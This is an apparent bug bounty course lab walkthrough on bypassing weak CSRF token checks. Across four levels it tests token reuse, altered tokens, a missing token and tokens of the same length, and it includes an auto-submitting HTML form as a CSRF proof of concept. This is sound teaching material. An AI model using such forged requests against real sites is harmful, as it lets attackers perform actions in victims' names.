This lab is for the CSRF for the Rat's bounty course.
You need to find a way to have the server verify the CSRF token and it gets harder with the levels going up.
= When the server verified the token succesfully, it will notify you.  
= If you failed, the server will say "Nope"

# 01.php
Let's send a request to see how it works
```http
POST /CSRF/01.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/01.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi&to=papa&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
And if we check the response our token is verified. What if we reuse this token again?
```http
POST /CSRF/01.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/01.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi&to=dada&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
And the response says our token is verified again! This means that this token is static and can be used multiple times. So we can perform CSRF.
If you want to you can generate a CSRF POC
```http
<html>
  <body>
    <form action="http://23.239.9.22/CSRF/01.php" method="POST">
      <input type="hidden" name="say" value="hi" />
	  <input type="hidden" name="to" value="hacked" />
	  <input type="hidden" name="crsf" value="86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c"/>
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

# 10.php
Let's see this request
```http
POST /CSRF/10.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/10.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi+&to=mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
Okay a token, can we reuse it?
```http
POST /CSRF/10.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/10.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi+&to=moma&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
Interesting it does work
What if we remove the last letter with a random letter?
```http
POST /CSRF/10.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/10.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi+&to=moma&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704d
```
It still works.
What if we remove the token?
```http
POST /CSRF/10.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/10.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=hi+&to=moma
```
And finally we get a `Nope`. So in this lab, the server checks if there is a token set, it doesn't check for values or anything. If there is a token, then pass it.

# 20.php
Again, send a request and observe it.
```http
POST /CSRF/20.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/20.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
If we try to change the value of the token we get a `Nope`
```http
POST /CSRF/20.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/20.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704d
```
But if we just remove a value and don't add anything we get an `Verified`
```http
POST /CSRF/20.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/20.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704
```
So what's happening here is that the server is only verifying how the token should look like and doesn't check it completely, it might be checking the first part, the middle part of the end part.

# 30.php
View the request
```http
POST /CSRF/30.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/30.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704c
```
Let's try to change the value.
```http
POST /CSRF/30.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/30.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Mom&token=86652a900dbb5c59636f2d794c20e6d53cfa5774bcb8af0a959027501a44704a
```
And it works, is it checking if the middle part, of our token or something? Let's change it with something with the same length.
```http
POST /CSRF/30.php HTTP/1.1
Host: 23.239.9.22
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://23.239.9.22
Connection: close
Referer: http://23.239.9.22/CSRF/30.php
Cookie: PHPSESSID=98dop64402medjbtml5k4vhr5d
Upgrade-Insecure-Requests: 1

say=Hi&to=Moms&token=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
```
And we get a `verified!`. So what we can take from this is that, the server is checking if it's the same length.
